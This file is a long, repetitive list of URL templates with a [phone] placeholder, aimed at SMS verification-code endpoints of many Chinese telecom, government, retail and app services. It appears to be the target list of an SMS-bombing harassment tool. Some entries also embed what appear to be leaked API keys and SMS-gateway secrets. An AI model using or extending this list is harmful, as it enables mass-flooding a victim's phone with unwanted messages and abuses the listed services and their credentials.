"https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", - "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", - "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", - "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", - "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1575815921608", - "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", - "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]&img_vc=", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", - "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]&sign=d012c7dbfeba6014a28b9093156cd52d&ts=1565428712975901&type=1", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", - "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://user.daojia.com/user/getSmscode?mobile=[phone]", - "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://uc.maodou.com/server/account/sendLoginCode?phone=[phone]", - "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", - "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", - "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", - "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", - "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", - "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", - "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", - "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", - "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", - "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", - "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", - "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", - "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", - "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", - "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", - "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", - "http://106.12.43.240/api.php?act=user&key=m898F3fn4rf53j643T42&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", - "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", - "http://srmemberapp.srgow.com/sys/captcha/[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://duanxin.diluw.com/index.php?hm=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=865499038835144&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", - "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", - "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", - "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", - "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", - "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", - "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", - "http://user.tgbus.com/api/action.ashx?callback=callback10491710835861462&t=sendsms&format=json&Action=0&phone=[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", - "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", - "http://api.jzhrj.cn/api/User/SendRegCode?mobile=[phone]&signature=b9ca097bdb7678ffe631d0aecb2615e16b4986f4&timestamp=1558168022&nonce=573&appid=CalendarGPRJ", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", - "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", - "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", - "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", - "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]/mineTker", - "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8,1&form.phoneNumber=[phone]&form.phoneType=1&fo", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - 